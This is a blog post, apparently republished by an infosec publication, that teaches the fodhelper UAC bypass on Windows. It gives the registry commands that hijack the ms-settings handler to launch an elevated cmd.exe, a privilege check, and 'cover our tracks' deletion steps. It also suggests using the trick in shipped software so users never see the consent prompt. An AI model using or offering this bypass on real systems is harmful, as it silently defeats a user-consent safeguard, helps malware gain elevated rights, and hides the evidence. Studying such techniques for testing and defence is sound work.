Under the Radar: Mastering the Art of Windows UAC Evasion!
I bet you know this feeling. You want to run something as an administrator on your own PC, and boom: Windows UAC (User Access Control) hits you in the face, even though it is your own PC. This is a small obstacle, but it attracts attention. And think about what to do when your script has to run something as an administrator? Pssst…listen closely: I’ll tell you a secret…
How to bypass UAC
To make it clear: The purpose of this method is to bypass the popup and NOT to escalate your privileges. This only works if you already have the rights to run the application as an administrator.
Lets begin:
We’ll work with the windows registry and the windows fodhelper (feature on demand). First we have to add a new registry key, where we store the command we want to run as administrator. I selected “cmd.exe” to try this out. We can add the key using the GUI, but this is easily noticeable and time consuming. So lets take a look at the CLI:
reg add “HKCU\Software\Classes\.abc\Shell\Open\command” /d “cmd.exe” /f
Reg add: add a registry entry (surprise surprise)
“HKCU\Software…”: the path to the entry
/d “cmd.exe”: sets the data value, cmd.exe in this case
/f: stands for force. So no confirmation is needed to run add the entry
reg add “HKCU\Software\Classes\ms-settings\CurVer” /d “.abc” /f
The same process here. Adding a new key.
fodhelper.exe
Then we run fodhelper and there we have the administrator-shell:
To check, if we realy have high privileges, we need to run:
whoami /groups | find “Label”
Medium mandatory level: nope, doesn’t work
High mandatory level: Congrats it worked
P.S.: To cover our tracks and run fodhelper properly, we need to run these two commands:
reg delete “HKEY_CURRENT_USER\Software\Classes\.abc\Shell\Open\command” /f
reg delete “HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer” /f
What can you use this for
First, if you are developing software that needs to execute commands with elevated privileges and you don’t want to instruct your users to run the script as an administrator or you want to avoid bothering them with the UAC popup. Additionally, if you are involved in ethical hacking or penetration testing and use a rubber ducky, you can employ these commands as a workaround for the “left arrow, enter” method. However, this option can be challenging to time correctly, and when using commands, timing becomes less critical.
Most of the time, the workaround works like a charm. If it doesn’t, you can simply use it to spawn a shell with elevated privileges and then execute your command inside the new console.
How does it work
Microsoft stated that this isn’t a bug because, in this case, UAC is used to ask the user if they know what they are doing rather than to protect the system from attacks. Fodhelper is a program with auto-elevate privileges. This means when you run it, it automatically runs as an administrator. And every process spawned by an elevated process is also elevated. In simple terms: If an admin console spawns a new console, it has the same permissions.
The registry tells Windows which program to use depending on the file extension, such as Firefox for .html files. If there is no specific application defined, the system-wide association will be used. With the command, we override the system-wide configuration to use “cmd.exe” to open “.abc” files. Fodhelper searches for this special key (HKCU\Software\Classes\ms-settings\Shell\Open\command). By overriding the keys, fodhelper runs our command. And since it has high privileges, our command also runs with elevated privileges.
Thanks for reading and let me know if want more of these posts.
Note from Publication: This story was uploaded at the permission of user “alda69” on 1/19/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
